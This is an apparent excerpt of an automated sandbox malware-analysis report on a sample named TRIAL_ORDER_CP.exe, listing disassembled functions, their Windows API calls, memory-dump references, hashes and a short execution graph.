                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                          • Instruction ID: 52c7d57b2d50c4e26d0c42f1be749ca1a93388b8845742b28701603c77c86054
                                          • Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                          • Instruction Fuzzy Hash: 89016270640209BBEF209F60DD4AFEE3B79EB04344F10803AFA02B51D0DBB99A559F58
                                          Function 70682655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 706812BB: GlobalAlloc.KERNELBASE(00000040,?,706812DB,?,7068137F,00000019,706811CA,-000000A0), ref: 706812C5
                                          • GlobalFree.KERNEL32(?), ref: 70682743
                                          • GlobalFree.KERNEL32(00000000), ref: 70682778
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc
                                          • String ID:
                                          • API String ID: 1780285237-0
                                          • Opcode ID: 3824f2a51a085bb2a32bfcef197be0977a1ccdca2adae9083c265e4d0f4c53ba
                                          • Instruction ID: 84e7fab3eba6a4636dc249189944b94dc87c568fbff39f58efcbd8320e17767e
                                          • Opcode Fuzzy Hash: 3824f2a51a085bb2a32bfcef197be0977a1ccdca2adae9083c265e4d0f4c53ba
                                          • Instruction Fuzzy Hash: 4731C2B2504202EFC7268F56CDF8D6E7BBBFB89344324452DF202972E4D77168459B62
                                          Function 70682480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalFree.KERNEL32(00000000), ref: 706825C2
                                            • Part of subcall function 706812CC: lstrcpynW.KERNEL32(00000000,?,7068137F,00000019,706811CA,-000000A0), ref: 706812DC
                                          • GlobalAlloc.KERNEL32(00000040), ref: 70682548
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70682563
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                          • String ID:
                                          • API String ID: 4216380887-0
                                          • Opcode ID: 4376a406a418de7cd35d68a1dab9a3fb3ab3bd67f3b2ab4d47d8365961dc07c4
                                          • Instruction ID: d62e932ebf749eaf388fa02f360d8198850aedd80384790446ac97762c8f07c2
                                          • Opcode Fuzzy Hash: 4376a406a418de7cd35d68a1dab9a3fb3ab3bd67f3b2ab4d47d8365961dc07c4
                                          • Instruction Fuzzy Hash: 624199B1008306EFD7159F25D874A6E77FAFB84310B20491DF5468A6D1EB70A984DB72
                                          Function 706816BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,706822D8,?,00000808), ref: 706816D5
                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,706822D8,?,00000808), ref: 706816DC
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,706822D8,?,00000808), ref: 706816F0
                                          • GetProcAddress.KERNEL32(706822D8,00000000), ref: 706816F7
                                          • GlobalFree.KERNEL32(00000000), ref: 70681700
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                          • String ID:
                                          • API String ID: 1148316912-0
                                          • Opcode ID: 882846cfce05aa05cf2db063ac561cde50c249f02b5465a84e8420ad08971d18
                                          • Instruction ID: 2ba5d004923a6175b1c188c2f62b4b7be78d81e08e7e243648011d8b44124b00
                                          • Opcode Fuzzy Hash: 882846cfce05aa05cf2db063ac561cde50c249f02b5465a84e8420ad08971d18
                                          • Instruction Fuzzy Hash: 9FF098732061387F96211BA79C4CDABBE9CEF8B2F9B210215F728921E096A15D0197F1
                                          Function 00405F2B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                            • Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405EDC
                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                          • lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405F84
                                          • GetFileAttributesW.KERNEL32(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75D23420,C:\Users\user\AppData\Local\Temp\), ref: 00405F94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\$P?z
                                          • API String ID: 3248276644-3222627218
                                          • Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                          • Instruction ID: f4f6e0775867387827aab8404002f3e8856b431f62ec50d584846b16db6dccac
                                          • Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                          • Instruction Fuzzy Hash: 9BF02D36105E5319D62273365C09AAF1544CF86358709057BF852B12D5CF3C8A53CC7E
                                          Function 00405E23 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E29
                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E33
                                          • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405E45
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E23
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-3355392842
                                          • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                          • Instruction ID: d63f260b1a4b66e3edf6d37d75e222a08c60d96d58f132ba82df153afabc7d48
                                          • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                          • Instruction Fuzzy Hash: EDD0A771101534BAC212AB54AC04CDF73ACAF46344342403BF541B30A5C77C5D5187FD
                                          Function 706810E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 70681171
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 706811E3
                                          • GlobalFree.KERNEL32 ref: 7068124A
                                          • GlobalFree.KERNEL32(?), ref: 7068129B
                                          • GlobalFree.KERNEL32(00000000), ref: 706812B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc
                                          • String ID:
                                          • API String ID: 1780285237-0
                                          • Opcode ID: 653348eec17a0e8e0b669c42a3d5aa6b8ddbec1e46215d6b6350edb44b95529d
                                          • Instruction ID: f1032bbe9e7cc79088bc4c53bc2b86ece50da694769497c96fc07138ae393018
                                          • Opcode Fuzzy Hash: 653348eec17a0e8e0b669c42a3d5aa6b8ddbec1e46215d6b6350edb44b95529d
                                          • Instruction Fuzzy Hash: B7515BB6500206AFD701CF69C879A5A77BCFB04315B204519FA46EF3E4E775AA80CB54
                                          Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                          • GetTickCount.KERNEL32 ref: 0040306F
                                          • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                          • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                          • Instruction ID: 04dff40eaa5975d4421a2039d3eb5be5080597dcfa90b8d0ab21d67e5ec7c10f
                                          • Opcode Fuzzy Hash: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                          • Instruction Fuzzy Hash: BFF05430406621AFC6616F50FD08A9B7B69FB45B12B45843BF145F11E8C73C48818B9D
                                          Function 00403B91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,75D23420,00000000,C:\Users\user\AppData\Local\Temp\,00403B69,00403A7F,0000000A,?,00000008,0000000A,0000000C), ref: 00403BAB
                                          • GlobalFree.KERNEL32(008DD7C0), ref: 00403BB2
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Free$GlobalLibrary
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 1100898210-3355392842
                                          • Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                          • Instruction ID: b7081a2a86391088548fef66407111aafa244a1a89fd4905b066b82f00895e7d
                                          • Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                          • Instruction Fuzzy Hash: 59E0C23340053057CB211F45ED04B1AB778AF95B26F09807BE940BB2618BBC2C438FC8
                                          Function 00405E6F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 00405E75
                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 00405E85
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\Desktop
                                          • API String ID: 2709904686-3370423016
                                          • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                          • Instruction ID: e625fb8110be14d05545ed3956eb9dcd351d24123ebbdb87cfc6543e98ba95a5
                                          • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                          • Instruction Fuzzy Hash: 27D05EB3400920AAC312A704DD00DAF73A8EF523447464466F881A71A5D7785D8186EC
                                          Function 00405FA9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB9
                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405FD1
                                          • CharNextA.USER32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE2
                                          • lstrlenA.KERNEL32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                          • Instruction ID: 0ddac3552a90187c63c7b8d1f8650bd486a880c4da7af56fddea67c471c8745b
                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                          • Instruction Fuzzy Hash: 5AF09631104515FFCB029FA5DE04D9FBBA8EF05350B2540B9F880F7250D678DE01ABA9

                                          Execution Graph

                                          Execution Coverage:0%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:100%
                                          Total number of Nodes:1
                                          Total number of Limit Nodes:0
                                          execution_graph 67897 33b52a80 LdrInitializeThunk

                                          Executed Functions

                                          Function 33B534E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5 33b534e0-33b534ec LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
